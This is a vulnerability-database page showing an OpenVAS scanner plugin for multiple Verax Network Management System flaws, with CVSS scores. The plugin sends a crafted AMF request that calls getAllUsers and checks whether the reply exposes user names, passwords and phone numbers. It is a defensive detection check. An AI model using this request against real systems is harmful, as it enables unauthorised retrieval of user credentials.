Lucene search

K
openvasCopyright (C) 2013 Greenbone AGOPENVAS:1361412562310803181
HistoryMar 15, 2013 - 12:00 a.m.

Verax Network Management System Multiple Vulnerabilities

2013-03-1500:00:00
Copyright (C) 2013 Greenbone AG
plugins.openvas.org
12

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

6.2 Medium

AI Score

Confidence

High

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.187 Low

EPSS

Percentile

96.2%

Verax Network Management System is prone to multiple vulnerabilities.

# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.803181");
  script_version("2023-07-27T05:05:08+0000");
  script_cve_id("CVE-2013-1350", "CVE-2013-1351", "CVE-2013-1352", "CVE-2013-1631");
  script_tag(name:"cvss_base", value:"6.4");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:N");
  script_tag(name:"last_modification", value:"2023-07-27 05:05:08 +0000 (Thu, 27 Jul 2023)");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2020-02-03 16:47:00 +0000 (Mon, 03 Feb 2020)");
  script_tag(name:"creation_date", value:"2013-03-15 13:15:33 +0530 (Fri, 15 Mar 2013)");
  script_name("Verax Network Management System Multiple Vulnerabilities");

  script_xref(name:"URL", value:"http://secunia.com/advisories/52473");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/58334");
  script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Mar/38");
  script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Mar/37");
  script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Mar/36");
  script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Mar/35");
  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/525916");
  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/525917");
  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/525918");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 9400);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to bypass certain security
  restrictions, perform unauthorized actions and obtain sensitive information.
  This may aid in launching further attacks.");

  script_tag(name:"affected", value:"Verax NMS version prior to 2.1.0");

  script_tag(name:"insight", value:"- An improper restricting access to certain actions via Action Message Format
  (AMF), which can be exploited to retrieve user information by requesting
  certain objects via AMF

  - The decryptPassword() uses a static, hard coded private key to facilitate
  process. These passwords should be considered insecure due to the fact
  that recovering the private key is decidedly trivial.

  - The private and public keys are hard coded into clientMain.swf the encrypted
  password could be captured and replayed against the service by an attacker.

  - The Verax NMS Console, users can navigate to monitored devices and perform
  predefined actions (NMSAction), such as repairing tables on a MySQL database
  or restarting services.");

  script_tag(name:"solution", value:"Upgrade to Verax NMS 2.1.0 or later.");

  script_tag(name:"summary", value:"Verax Network Management System is prone to multiple vulnerabilities.");

  script_tag(name:"qod_type", value:"remote_app");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default:9400);

host = http_host_name(port:port);

sndReq = http_get(item:string("/enetworkmanagementsystem-fds/eNetwor",
         "kManagementSystem/index.jsp"), port:port);
rcvRes = http_keepalive_send_recv(port:port, data:sndReq);

if("Path=/enetworkmanagementsystem-fds" >< rcvRes)
{

  postdata = raw_string(0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x17,
                        0x75, 0x73, 0x65, 0x72, 0x53, 0x65, 0x72, 0x76,
                        0x69, 0x63, 0x65, 0x2e, 0x67, 0x65, 0x74, 0x41,
                        0x6c, 0x6c, 0x55, 0x73, 0x65, 0x72, 0x73, 0x00,
                        0x02, 0x2f, 0x31, 0x00, 0x00, 0x00, 0x00, 0x0a,
                        0x00, 0x00, 0x00, 0x00);

  req = string("POST /enetworkmanagementsystem-fds/messagebroker/amf HTTP/1.1\r\n",
               "Host: ", host, "\r\n",
               "Content-Type: application/x-amf\r\n",
               "Content-Length: ", strlen(postdata), "\r\n",
               "\r\n", postdata);
  rcvRes = http_keepalive_send_recv(port:port, data:req);

  if("user_id" ><  rcvRes && "user_pass" >< rcvRes &&
     "user_phone" >< rcvRes && "enetworkmanagementsystem" >< rcvRes)
  {
    security_message(port:port);
    exit(0);
  }
}

exit(99);

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

6.2 Medium

AI Score

Confidence

High

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.187 Low

EPSS

Percentile

96.2%

Related for OPENVAS:1361412562310803181